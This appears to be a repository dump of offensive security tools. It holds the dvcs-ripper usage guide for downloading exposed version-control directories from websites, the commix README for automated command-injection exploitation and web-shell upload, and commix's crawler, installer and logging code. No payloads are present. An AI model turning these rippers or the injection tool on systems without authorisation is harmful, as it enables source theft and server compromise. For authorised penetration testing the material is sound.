`sudo apt-get install cvs subversion git bzr mercurial` 31 | 32 | ## Docker 33 | 34 | In case you just want docker version, it is here: 35 | 36 | https://github.com/kost/docker-webscan/tree/master/alpine-dvcs-ripper 37 | 38 | Just say something like: 39 | 40 | `docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u http://www.example.org/.git` 41 | 42 | 43 | GIT 44 | =========== 45 | Example run (for git): 46 | 47 | `rip-git.pl -v -u http://www.example.com/.git/` 48 | 49 | It will automatically do `git checkout -f` 50 | 51 | or if you would like to ignore SSL certification verification (with -s): 52 | 53 | `rip-git.pl -s -v -u http://www.example.com/.git/` 54 | 55 | Mercurial/HG 56 | =========== 57 | Example run (for hg): 58 | 59 | `rip-hg.pl -v -u http://www.example.com/.hg/` 60 | 61 | It will automatically do `hg revert ` 62 | 63 | or if you would like to ignore SSL certification verification (with -s): 64 | 65 | `rip-hg.pl -s -v -u http://www.example.com/.hg/` 66 | 67 | Bazaar/bzr 68 | =========== 69 | Example run (for bzr): 70 | 71 | `rip-bzr.pl -v -u http://www.example.com/.bzr/` 72 | 73 | It will automatically do `bzr revert` 74 | 75 | or if you would like to ignore SSL certification verification (with -s): 76 | 77 | `rip-bzr.pl -s -v -u http://www.example.com/.bzr/` 78 | 79 | 80 | SVN 81 | =========== 82 | It supports OLDER and NEWER version of svn client formats. Older is with .svn files in every directory, while 83 | newer version have single .svn directory and wc.db in .svn directory. It will automatically detect which 84 | format is used on the target. 85 | 86 | Example run (for SVN): 87 | 88 | `rip-svn.pl -v -u http://www.example.com/.svn/` 89 | 90 | It will automatically do `svn revert -R .` 91 | 92 | CVS 93 | =========== 94 | Example run (for CVS): 95 | 96 | `rip-cvs.pl -v -u http://www.example.com/CVS/` 97 | 98 | This will not rip CVS, but it will display useful info. 99 | 100 | ## Advance usage examples 101 | 102 | Some examples how it can be used 103 | 104 | ### Output handling 105 | 106 | Download git tree to specific output dir: 107 | 108 | `rip-git.pl -o /my/previously/made/dir -v -u http://www.example.com/.git/` 109 | 110 | Download git tree to specific output dir (creating dir `http__www.example.com_.git_` for url): 111 | 112 | `rip-git.pl -m -o /dir -v -u http://www.example.com/.git/` 113 | 114 | ### Redis usage with docker 115 | 116 | Create Redis docker container: 117 | 118 | `docker run --rm --name myredis -it -v /my/host/dir/data:/data:rw k0st/alpine-redis` 119 | 120 | In another terminal, just link redis container and say something like this: 121 | 122 | `docker run --rm --link=myredis:redis -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -e docker -v -u http://www.example.org/.git -m -o /work` 123 | 124 | ### Using redis for resuming work of ripping 125 | 126 | Create Redis docker container: 127 | 128 | `docker run --name redisdvcs -it -v /my/host/dir/data:/data:rw k0st/alpine-redis` 129 | 130 | In another terminal, just link redis container and say something like this: 131 | 132 | `docker run --link=redisdvcs:redis -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -n -e docker -v -u http://www.example.org/.git -m -o /work` 133 | 134 | ### Abusing redis for massive parallel tasks 135 | 136 | Create global NFS and mount /work on each client. Create global Redis docker container: 137 | 138 | `docker run --name redisdvcs -it -v /my/host/dir/data:/data:rw k0st/alpine-redis` 139 | 140 | In another terminal, just link redis container and say something like this on 1st client 141 | 142 | `docker run -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -n -e global.docker.ip -v -u http://www.example.org/.git -t 10 -c -m -o /work` 143 | 144 | In another terminal, just link redis container and say something like this on 2nd client: 145 | 146 | `docker run -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -n -e global.docker.ip -v -u http://www.example.org/.git -t 10 -c -m -o /work` 147 | 148 | and so on... 149 | 150 | You need to perform `git checkout -f` yourself on the end - of course! 151 | 152 | ## Future 153 | 154 | Feel free to implement something and send pull request. Feel free to suggest any feature. Lot of features 155 | actually were implemented by request 156 | 157 | ### ToDo 158 | - [ ] Recognize 404 pages which return 200 in SVN/CVS 159 | - [ ] Try to repeat each trick after previous trick was successful 160 | - [ ] Progress bars 161 | 162 | ### Done 163 | - [x] Support for brute forcing pack names 164 | - [x] Intelligent guessing of packed refs 165 | - [x] Support for objects/info/packs from https://www.kernel.org/pub/software/scm/git/docs/gitrepository-layout.html 166 | - [x] Recognize 404 pages which return 200 167 | - [x] Introduce ignore SSL/TLS verification in SVN/CVS 168 | - [x] Bzr support 169 | 170 | -------------------------------------------------------------------------------- /commix/README.md: -------------------------------------------------------------------------------- 1 | [![Logo](https://camo.githubusercontent.com/41258687d868cf76951a37f6be7961c4c862dfb3/687474703a2f2f692e696d6775722e636f6d2f6c4b6762336c712e706e67)](http://commixproject.com) 2 | 3 | [![Build Status](https://api.travis-ci.org/commixproject/commix.svg?branch=master)](https://api.travis-ci.org/commixproject/commix) 4 | [![Version 1.9](https://img.shields.io/badge/Version-1.9-green.svg)](https://github.com/commixproject/commix/releases/tag/v1.9-20170502 5 | ) 6 | [![Python 2.6-2.7](https://img.shields.io/badge/Python-2.6--2.7-yellow.svg)](http://www.python.org/download/) 7 | [![GPLv3 License](https://img.shields.io/badge/License-GPLv3-red.svg)](https://github.com/commixproject/commix/blob/master/readme/COPYING) 8 | [![Twitter](https://img.shields.io/badge/Twitter-@commixproject-blue.svg)](http://www.twitter.com/commixproject) 9 | 10 | #### General Information 11 | 12 | **Commix** (short for [**comm**]and [**i**]njection e[**x**]ploiter) is an automated tool written by Anastasios Stasinopoulos ([@ancst](https://twitter.com/ancst)) that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to **[command injection](https://www.owasp.org/index.php/Command_Injection)** attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header. 13 | 14 | #### Disclaimer 15 | 16 | This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! 17 | 18 | #### Requirements 19 | 20 | **[Python](http://www.python.org/download/)** version **2.6.x** or **2.7.x** is required for running this program. 21 | 22 | #### Installation 23 | 24 | Download commix by cloning the Git repository: 25 | 26 | git clone https://github.com/commixproject/commix.git commix 27 | 28 | Commix comes packaged on the **official repositories** of the following Linux distributions, so you can use the **package manager** to install it! 29 | 30 | - [ArchStrike](https://archstrike.org/) 31 | - [BlackArch Linux](http://blackarch.org/) 32 | - [BackBox](https://backbox.org/) 33 | - [Kali Linux](https://www.kali.org/) 34 | - [Parrot Security OS](https://www.parrotsec.org/) 35 | - [Weakerthan Linux](http://www.weaknetlabs.com/) 36 | 37 | Commix also comes **as a plugin**, on the following penetration testing frameworks: 38 | 39 | - [TrustedSec's Penetration Testers Framework (PTF)](https://github.com/trustedsec/ptf) 40 | - [OWASP Offensive Web Testing Framework (OWTF)](https://github.com/owtf/owtf) 41 | - [CTF-Tools](https://github.com/zardus/ctf-tools) 42 | - [PentestBox](https://tools.pentestbox.com/) 43 | - [PenBox](https://github.com/x3omdax/PenBox) 44 | - [Katoolin](https://github.com/LionSec/katoolin) 45 | - [Aptive's Penetration Testing tools](https://github.com/Aptive/penetration-testing-tools) 46 | - [Homebrew Tap - Pen Test Tools ](https://github.com/sidaf/homebrew-pentest) 47 | 48 | #### Supported Platforms 49 | 50 | - Linux 51 | - Mac OS X 52 | - Windows (experimental) 53 | 54 | #### Usage 55 | 56 | To get a list of all options and switches use: 57 | 58 | python commix.py -h 59 | 60 | **Q**: Where can I check all the available options and switches? 61 | 62 | **A**: Check the '**[usage](https://github.com/commixproject/commix/wiki/Usage)**' wiki page. 63 | 64 | #### Usage Examples 65 | 66 | **Q**: Can I get some basic ideas on how to use commix? 67 | 68 | **A**: Just go and check the '**[usage examples](https://github.com/commixproject/commix/wiki/Usage-Examples)**' wiki page, where there are several test cases and attack scenarios. 69 | 70 | #### Upload Shells 71 | 72 | **Q**: How easily can I upload web-shells on a target host via commix? 73 | 74 | **A**: Commix enables you to upload web-shells (e.g metasploit PHP meterpreter) easily on target host. For more, check the '**[upload shells](https://github.com/commixproject/commix/wiki/Upload-shells)**' wiki page. 75 | 76 | #### Modules Development 77 | 78 | **Q**: Do you want to increase the capabilities of the commix tool and/or to adapt it to our needs? 79 | 80 | **A**: You can easily develop and import our own modules. For more, check the '**[module development](https://github.com/commixproject/commix/wiki/Module-Development)**' wiki page. 81 | 82 | #### Command Injection Testbeds 83 | 84 | **Q**: How can I test or evaluate the exploitation abilities of commix? 85 | 86 | **A**: Check the '**[command injection testbeds](https://github.com/commixproject/commix/wiki/Command-Injection-Testbeds)**' wiki page which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks. 87 | 88 | #### Exploitation Demos 89 | 90 | **Q**: Is there a place where I can check for demos of commix? 91 | 92 | **A**: If you want to see a collection of demos, about the exploitation abilities of commix, take a look at the '**[exploitation demos](https://github.com/commixproject/commix/wiki/Exploitation-Demos)**' wiki page. 93 | 94 | #### Bugs and Enhancements 95 | 96 | **Q**: I found a bug / I have to suggest a new feature! What can I do? 97 | 98 | **A**: For bug reports or enhancements, please open an issue **[here](https://github.com/commixproject/commix/issues)**. 99 | 100 | #### Presentations and White Papers 101 | **Q**: Is there a place where I can find presentations and/or white papers regarding commix? 102 | 103 | **A**: For presentations and/or white papers published in conferences, check the '**[presentations](https://github.com/commixproject/commix/wiki/Presentations)**' wiki page. 104 | 105 | #### Support and Donations 106 | **Q**: Except for tech stuff (bug reports or enhancements) is there any other way that I can support the development of commix? 107 | 108 | **A**: Sure! Commix is the outcome of many hours of work and total personal dedication. Feel free to '**[donate](https://www.paypal.com/gr/webapps/mpp/send-money-online)**' via PayPal to `donations@commixproject.com` and instantly prove your feelings for it! :). -------------------------------------------------------------------------------- /commix/src/utils/crawler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import re 17 | import sys 18 | import urllib 19 | import urllib2 20 | import urlparse 21 | 22 | from src.utils import menu 23 | from src.utils import settings 24 | from src.core.requests import headers 25 | from src.thirdparty.colorama import Fore, Back, Style, init 26 | from src.thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup 27 | 28 | """ 29 | Do a request to target URL. 30 | """ 31 | def request(url): 32 | # Check if defined POST data 33 | if menu.options.data: 34 | request = urllib2.Request(url, menu.options.data) 35 | else: 36 | request = urllib2.Request(url) 37 | headers.do_check(request) 38 | response = urllib2.urlopen(request) 39 | soup = BeautifulSoup(response) 40 | return soup 41 | 42 | """ 43 | Check for URLs in sitemap.xml. 44 | """ 45 | def sitemap(url): 46 | if not url.endswith(".xml"): 47 | url = urlparse.urljoin(url, "/sitemap.xml") 48 | try: 49 | soup = request(url) 50 | href_list = [] 51 | for match in soup.findAll("loc"): 52 | href_list.append(match.text) 53 | return href_list 54 | except: 55 | warn_msg = "The 'sitemap.xml' not found." 56 | print settings.print_warning_msg(warn_msg) 57 | return "" 58 | 59 | """ 60 | Grab the crawled hrefs. 61 | """ 62 | def crawling(url): 63 | soup = request(url) 64 | href_list = [] 65 | for tag in soup.findAll('a', href=True): 66 | tag['href'] = urlparse.urljoin(url, tag['href']) 67 | o = urlparse.urlparse(url) 68 | if o.netloc in tag['href'] : 69 | href_list.append(tag['href']) 70 | return href_list 71 | 72 | """ 73 | The crawing process. 74 | """ 75 | def do_process(url): 76 | crawled_href = crawling(url) 77 | if menu.options.DEFAULT_CRAWLDEPTH_LEVEL == 1: 78 | return crawled_href 79 | else: 80 | for url in crawled_href: 81 | crawled_href = crawling(url) 82 | return crawled_href 83 | 84 | """ 85 | The main crawler. 86 | """ 87 | def crawler(url): 88 | if not menu.options.sitemap_url: 89 | info_msg = "Starting crawler and searching for " 90 | info_msg += "links with depth " + str(menu.options.DEFAULT_CRAWLDEPTH_LEVEL) + "." 91 | print settings.print_info_msg(info_msg) 92 | 93 | while True: 94 | if not menu.options.sitemap_url: 95 | if not menu.options.batch: 96 | question_msg = "Do you want to check target for " 97 | question_msg += "the existence of 'sitemap.xml'? [Y/n] > " 98 | sys.stdout.write(settings.print_question_msg(question_msg)) 99 | sitemap_check = sys.stdin.readline().replace("\n","").lower() 100 | else: 101 | sitemap_check = "" 102 | if len(sitemap_check) == 0: 103 | sitemap_check = "y" 104 | if sitemap_check in settings.CHOICE_YES: 105 | sitemap_check = True 106 | break 107 | elif sitemap_check in settings.CHOICE_NO: 108 | sitemap_check = False 109 | break 110 | elif sitemap_check in settings.CHOICE_QUIT: 111 | sys.exit(0) 112 | else: 113 | err_msg = "'" + sitemap_check + "' is not a valid answer." 114 | print settings.print_error_msg(err_msg) 115 | pass 116 | else: 117 | sitemap_check = True 118 | break 119 | 120 | if sitemap_check: 121 | output_href = sitemap(url) 122 | sitemap_check = output_href 123 | for recursion in output_href: 124 | if recursion.endswith(".xml") and "sitemap" in recursion.lower(): 125 | while True: 126 | warn_msg = "A sitemap recursion was detected " + "'" + recursion + "'." 127 | print settings.print_warning_msg(warn_msg) 128 | if not menu.options.batch: 129 | question_msg = "Do you want to follow the detected recursion? [Y/n] > " 130 | sys.stdout.write(settings.print_question_msg(question_msg)) 131 | sitemap_check = sys.stdin.readline().replace("\n","").lower() 132 | else: 133 | sitemap_check = "" 134 | if len(sitemap_check) == 0: 135 | sitemap_check = "y" 136 | if sitemap_check in settings.CHOICE_YES: 137 | output_href = sitemap(recursion) 138 | sitemap_check = output_href 139 | break 140 | elif sitemap_check in settings.CHOICE_NO: 141 | break 142 | elif sitemap_check in settings.CHOICE_QUIT: 143 | sys.exit(0) 144 | else: 145 | err_msg = "'" + sitemap_check + "' is not a valid answer." 146 | print settings.print_error_msg(err_msg) 147 | pass 148 | 149 | if not sitemap_check: 150 | output_href = do_process(url) 151 | 152 | info_msg = "Checking " 153 | if sitemap_check: 154 | info_msg += "targets's sitemap.xml " 155 | info_msg += "for usable links with GET parameters... " 156 | sys.stdout.write(settings.print_info_msg(info_msg)) 157 | sys.stdout.flush() 158 | 159 | succeed_banner = True 160 | valid_url_found = False 161 | for check_url in output_href: 162 | # Check for usable URL with GET parameters 163 | if re.search(settings.GET_PARAMETERS_REGEX, check_url): 164 | valid_url_found = True 165 | if succeed_banner: 166 | print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" 167 | print settings.print_success_msg(check_url) 168 | if not menu.options.batch: 169 | question_msg = "Do you want to use this URL to perform tests? [Y/n] > " 170 | sys.stdout.write(settings.print_question_msg(question_msg)) 171 | use_url = sys.stdin.readline().replace("\n","").lower() 172 | else: 173 | use_url = "" 174 | if len(use_url) == 0: 175 | use_url = "y" 176 | if use_url in settings.CHOICE_YES: 177 | return check_url 178 | elif use_url in settings.CHOICE_NO: 179 | succeed_banner = False 180 | pass 181 | elif gotshell in settings.CHOICE_QUIT: 182 | sys.exit(0) 183 | 184 | if not valid_url_found: 185 | print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" 186 | return url 187 | 188 | # eof -------------------------------------------------------------------------------- /commix/src/utils/install.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import sys 18 | import platform 19 | import subprocess 20 | 21 | from src.utils import settings 22 | from src.utils import requirments 23 | from src.thirdparty.colorama import Fore, Back, Style, init 24 | 25 | """ 26 | Make a local installation of 'commix' on your system. 27 | """ 28 | 29 | """ 30 | The un-installer. 31 | """ 32 | def uninstaller(): 33 | info_msg = "Starting the uninstaller... " 34 | sys.stdout.write(settings.print_info_msg(info_msg)) 35 | sys.stdout.flush() 36 | try: 37 | subprocess.Popen("rm -rf /usr/bin/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 38 | subprocess.Popen("rm -rf /usr/share/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 39 | except: 40 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 41 | sys.exit(0) 42 | 43 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 44 | sys.stdout.flush() 45 | success_msg = "The un-installation of commix has finished!" 46 | print settings.print_success_msg(success_msg) 47 | 48 | """ 49 | The installer. 50 | """ 51 | def installer(): 52 | packages = "build-essential python-dev" 53 | dependencies = "git python-pip" 54 | 55 | info_msg = "Starting the installer... " 56 | sys.stdout.write(settings.print_info_msg(info_msg)) 57 | sys.stdout.flush() 58 | 59 | # Check if OS is Linux. 60 | if platform.system() == "Linux": 61 | 62 | # You need to have root privileges to run this script 63 | if os.geteuid() != 0: 64 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 65 | err_msg = "You need to have root privileges to run this option!" 66 | print settings.print_critical_msg(err_msg) 67 | sys.exit(0) 68 | 69 | # Check if commix is already installed. 70 | if os.path.isdir("/usr/share/" + settings.APPLICATION + ""): 71 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 72 | warn_msg = "It seems that " + settings.APPLICATION 73 | warn_msg += " is already installed in your system." 74 | print settings.print_warning_msg(warn_msg) 75 | while True: 76 | if not menu.options.batch: 77 | question_msg = "Do you want to remove commix? [Y/n] > " 78 | sys.stdout.write(settings.print_question_msg(question_msg)) 79 | uninstall = sys.stdin.readline().replace("\n","").lower() 80 | else: 81 | uninstall = "" 82 | if len(uninstall) == 0: 83 | uninstall = "y" 84 | if uninstall in settings.CHOICE_YES: 85 | uninstaller() 86 | sys.exit(0) 87 | elif uninstall in settings.CHOICE_NO or \ 88 | uninstall in settings.CHOICE_QUIT: 89 | sys.exit(0) 90 | else: 91 | err_msg = "'" + uninstall + "' is not a valid answer." 92 | print settings.print_error_msg(err_msg) 93 | pass 94 | 95 | # Check for git. 96 | if not os.path.isfile("/usr/bin/git") or not os.path.isfile("/usr/bin/pip"): 97 | # Install requirement. 98 | if os.path.isfile("/etc/apt/sources.list"): 99 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 100 | sys.stdout.flush() 101 | # Check for dependencies. 102 | dependencies_items = dependencies.split() 103 | for item in dependencies_items: 104 | requirments.do_check(item) 105 | else: 106 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 107 | err_msg = "The installer is not designed for any " 108 | err_msg += "other Linux distro than Ubuntu / Debian." 109 | print settings.print_critical_msg(err_msg) 110 | err_msg = " Please install manually: " + dependencies 111 | print Back.RED + err_msg + Style.RESET_ALL 112 | print "" 113 | sys.exit(0) 114 | 115 | # Force install of necessary packages 116 | subprocess.Popen("apt-get --force-yes -y install " + packages + ">/dev/null 2>&1", shell=True).wait() 117 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 118 | sys.stdout.flush() 119 | 120 | info_msg = "Installing " + settings.APPLICATION 121 | info_msg += " into the /usr/share/" + settings.APPLICATION + "... " 122 | sys.stdout.write(settings.print_info_msg(info_msg)) 123 | try: 124 | current_dir = os.getcwd() 125 | subprocess.Popen("cp -r " + current_dir + " /usr/share/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 126 | subprocess.Popen("chmod 775 /usr/share/" + settings.APPLICATION + "/" + settings.APPLICATION + ".py >/dev/null 2>&1", shell=True).wait() 127 | except: 128 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 129 | sys.exit(0) 130 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 131 | sys.stdout.flush() 132 | 133 | info_msg = "Installing " + settings.APPLICATION 134 | info_msg += " to /usr/bin/" + settings.APPLICATION + "... " 135 | sys.stdout.write(settings.print_info_msg(info_msg)) 136 | try: 137 | with open("/usr/bin/" + settings.APPLICATION, 'w') as f: 138 | f.write('#!/bin/bash\n') 139 | f.write('cd /usr/share/commix/ && ./commix.py "$@"\n') 140 | subprocess.Popen("chmod +x /usr/bin/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 141 | except: 142 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 143 | sys.exit(0) 144 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 145 | sys.stdout.flush() 146 | 147 | #Create the Output Directory 148 | OUTPUT_DIR = ".output/" 149 | try: 150 | os.stat(OUTPUT_DIR) 151 | except: 152 | os.mkdir(OUTPUT_DIR) 153 | 154 | success_msg = "The installation is finished! Type '" 155 | success_msg += settings.APPLICATION + "' to launch it." 156 | print settings.print_success_msg(success_msg) 157 | 158 | else : 159 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 160 | err_msg = "The installer is not designed for any other system other than Linux." 161 | print settings.print_critical_msg(err_msg) 162 | err_msg = " Please install manually: " + packages + dependencies 163 | print settings.print_critical_msg(err_msg) 164 | print "" 165 | sys.exit(0) 166 | 167 | #eof -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/winterm.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | from . import win32 3 | 4 | 5 | # from wincon.h 6 | class WinColor(object): 7 | BLACK = 0 8 | BLUE = 1 9 | GREEN = 2 10 | CYAN = 3 11 | RED = 4 12 | MAGENTA = 5 13 | YELLOW = 6 14 | GREY = 7 15 | 16 | # from wincon.h 17 | class WinStyle(object): 18 | NORMAL = 0x00 # dim text, dim background 19 | BRIGHT = 0x08 # bright text, dim background 20 | BRIGHT_BACKGROUND = 0x80 # dim text, bright background 21 | 22 | class WinTerm(object): 23 | 24 | def __init__(self): 25 | self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes 26 | self.set_attrs(self._default) 27 | self._default_fore = self._fore 28 | self._default_back = self._back 29 | self._default_style = self._style 30 | # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. 31 | # So that LIGHT_EX colors and BRIGHT style do not clobber each other, 32 | # we track them separately, since LIGHT_EX is overwritten by Fore/Back 33 | # and BRIGHT is overwritten by Style codes. 34 | self._light = 0 35 | 36 | def get_attrs(self): 37 | return self._fore + self._back * 16 + (self._style | self._light) 38 | 39 | def set_attrs(self, value): 40 | self._fore = value & 7 41 | self._back = (value >> 4) & 7 42 | self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) 43 | 44 | def reset_all(self, on_stderr=None): 45 | self.set_attrs(self._default) 46 | self.set_console(attrs=self._default) 47 | 48 | def fore(self, fore=None, light=False, on_stderr=False): 49 | if fore is None: 50 | fore = self._default_fore 51 | self._fore = fore 52 | # Emulate LIGHT_EX with BRIGHT Style 53 | if light: 54 | self._light |= WinStyle.BRIGHT 55 | else: 56 | self._light &= ~WinStyle.BRIGHT 57 | self.set_console(on_stderr=on_stderr) 58 | 59 | def back(self, back=None, light=False, on_stderr=False): 60 | if back is None: 61 | back = self._default_back 62 | self._back = back 63 | # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style 64 | if light: 65 | self._light |= WinStyle.BRIGHT_BACKGROUND 66 | else: 67 | self._light &= ~WinStyle.BRIGHT_BACKGROUND 68 | self.set_console(on_stderr=on_stderr) 69 | 70 | def style(self, style=None, on_stderr=False): 71 | if style is None: 72 | style = self._default_style 73 | self._style = style 74 | self.set_console(on_stderr=on_stderr) 75 | 76 | def set_console(self, attrs=None, on_stderr=False): 77 | if attrs is None: 78 | attrs = self.get_attrs() 79 | handle = win32.STDOUT 80 | if on_stderr: 81 | handle = win32.STDERR 82 | win32.SetConsoleTextAttribute(handle, attrs) 83 | 84 | def get_position(self, handle): 85 | position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition 86 | # Because Windows coordinates are 0-based, 87 | # and win32.SetConsoleCursorPosition expects 1-based. 88 | position.X += 1 89 | position.Y += 1 90 | return position 91 | 92 | def set_cursor_position(self, position=None, on_stderr=False): 93 | if position is None: 94 | # I'm not currently tracking the position, so there is no default. 95 | # position = self.get_position() 96 | return 97 | handle = win32.STDOUT 98 | if on_stderr: 99 | handle = win32.STDERR 100 | win32.SetConsoleCursorPosition(handle, position) 101 | 102 | def cursor_adjust(self, x, y, on_stderr=False): 103 | handle = win32.STDOUT 104 | if on_stderr: 105 | handle = win32.STDERR 106 | position = self.get_position(handle) 107 | adjusted_position = (position.Y + y, position.X + x) 108 | win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) 109 | 110 | def erase_screen(self, mode=0, on_stderr=False): 111 | # 0 should clear from the cursor to the end of the screen. 112 | # 1 should clear from the cursor to the beginning of the screen. 113 | # 2 should clear the entire screen, and move cursor to (1,1) 114 | handle = win32.STDOUT 115 | if on_stderr: 116 | handle = win32.STDERR 117 | csbi = win32.GetConsoleScreenBufferInfo(handle) 118 | # get the number of character cells in the current buffer 119 | cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y 120 | # get number of character cells before current cursor position 121 | cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X 122 | if mode == 0: 123 | from_coord = csbi.dwCursorPosition 124 | cells_to_erase = cells_in_screen - cells_before_cursor 125 | if mode == 1: 126 | from_coord = win32.COORD(0, 0) 127 | cells_to_erase = cells_before_cursor 128 | elif mode == 2: 129 | from_coord = win32.COORD(0, 0) 130 | cells_to_erase = cells_in_screen 131 | # fill the entire screen with blanks 132 | win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) 133 | # now set the buffer's attributes accordingly 134 | win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) 135 | if mode == 2: 136 | # put the cursor where needed 137 | win32.SetConsoleCursorPosition(handle, (1, 1)) 138 | 139 | def erase_line(self, mode=0, on_stderr=False): 140 | # 0 should clear from the cursor to the end of the line. 141 | # 1 should clear from the cursor to the beginning of the line. 142 | # 2 should clear the entire line. 143 | handle = win32.STDOUT 144 | if on_stderr: 145 | handle = win32.STDERR 146 | csbi = win32.GetConsoleScreenBufferInfo(handle) 147 | if mode == 0: 148 | from_coord = csbi.dwCursorPosition 149 | cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X 150 | if mode == 1: 151 | from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) 152 | cells_to_erase = csbi.dwCursorPosition.X 153 | elif mode == 2: 154 | from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) 155 | cells_to_erase = csbi.dwSize.X 156 | # fill the entire screen with blanks 157 | win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) 158 | # now set the buffer's attributes accordingly 159 | win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) 160 | 161 | def set_title(self, title): 162 | win32.SetConsoleTitle(title) 163 | -------------------------------------------------------------------------------- /commix/src/utils/logs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import re 18 | import sys 19 | import time 20 | import urllib 21 | import sqlite3 22 | import datetime 23 | 24 | from src.utils import menu 25 | from src.utils import settings 26 | from src.utils import session_handler 27 | 28 | from src.thirdparty.colorama import Fore, Back, Style, init 29 | 30 | readline_error = False 31 | if settings.IS_WINDOWS: 32 | try: 33 | import readline 34 | except ImportError: 35 | try: 36 | import pyreadline as readline 37 | except ImportError: 38 | readline_error = True 39 | else: 40 | try: 41 | import readline 42 | if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): 43 | import gnureadline as readline 44 | except ImportError: 45 | try: 46 | import gnureadline as readline 47 | except ImportError: 48 | readline_error = True 49 | pass 50 | 51 | 52 | """ 53 | 1. Generate injection logs (logs.txt) in "./ouput" file. 54 | 2. Check for logs updates and apply if any! 55 | """ 56 | 57 | """ 58 | Save command history. 59 | """ 60 | def save_cmd_history(): 61 | cli_history = os.path.expanduser(settings.CLI_HISTORY) 62 | if os.path.exists(cli_history): 63 | readline.write_history_file(cli_history) 64 | 65 | """ 66 | Load commands from history. 67 | """ 68 | def load_cmd_history(): 69 | cli_history = os.path.expanduser(settings.CLI_HISTORY) 70 | if os.path.exists(cli_history): 71 | readline.read_history_file(cli_history) 72 | 73 | """ 74 | Create log files 75 | """ 76 | def create_log_file(url, output_dir): 77 | if not output_dir.endswith("/"): 78 | output_dir = output_dir + "/" 79 | 80 | parts = url.split('//', 1) 81 | try: 82 | host = parts[1].split('/', 1)[0] 83 | except IndexError: 84 | host = parts[0].split('/', 1)[0] 85 | 86 | # Check if port is defined to host. 87 | if ":" in host: 88 | host = host.replace(":","_") 89 | 90 | try: 91 | os.stat(output_dir + host + "/") 92 | except: 93 | os.mkdir(output_dir + host + "/") 94 | 95 | # Create cli history file if does not exists. 96 | settings.CLI_HISTORY = output_dir + host + "/" + "cli_history" 